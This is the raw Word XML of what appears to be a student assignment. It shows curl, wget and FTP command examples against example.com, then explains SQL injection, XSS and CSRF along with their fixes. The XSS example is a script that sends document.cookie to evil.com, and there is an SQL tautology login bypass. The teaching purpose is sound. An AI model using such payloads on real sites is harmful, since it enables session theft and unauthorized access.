          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET Request using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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curl http://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Fetches the homepage of example.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST Request using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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curl -X POST -d "name=Ayush&amp;age=20" http://example.com/form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sends form data using HTTP POST method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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wget http://example.com/file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Downloads a file from the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>2. Simulate FTP Requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download File via FTP using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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curl -u username:password ftp://ftp.example.com/file.txt -o file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Downloads a file from an FTP server with authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upload File via FTP using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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curl -T upload.txt -u username:password ftp://ftp.example.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Uploads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>upload.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FTP Session using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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tp ftp.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Then:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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Username: yourusername</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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Password: yourpassword</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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tp&gt; ls            # List files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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tp&gt; get file.txt  # Download file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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tp&gt; put file.txt  # Upload file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1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tp&gt; bye           # Exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/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"/>
        <w:gridCol w:w="3576"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A52A6" w:rsidTr="008A52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A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E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:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E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A52A6" w:rsidTr="008A52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52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Versatile tool for HTTP/FTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A52A6" w:rsidTr="008A52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52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Primarily for downloading files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A52A6" w:rsidTr="008A52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52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Built-in FTP command line tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify and explain three common application security vulnerabilities. Suggest possible solutions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Occurs when an attacker inserts malicious SQL code into an input field to manipulate the database (e.g., bypass login or retrieve sensitive data).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>🔓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1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SELECT * FROM users WHERE username = 'admin' AND password = '123' OR '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>✅ Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>prepared statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Validate and sanitize all user inputs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Use ORM libraries (e.g., SQLAlchemy, Hibernate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>📌 Explanation:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>XSS allows attackers to inject malicious scripts into webpages viewed by other users, often to steal cookies or session data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>🔓 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='http://evil.com?cookie='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>✅ Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Escape special characters in HTML, JavaScript, and URLs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use content security policy (CSP) headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitize user-generated content before rendering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Tricks a user into performing an action (like submitting a form) on a web app where they're already authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>🔓 Example:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>A hidden form on an attacker’s page makes the user unknowingly change their password on another site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>✅ Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CSRF tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in forms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRPr="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attribute in cookies</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Design a basic three-tier software architecture diagram for a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E249E1" w:rsidRDefault="00E249E1" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
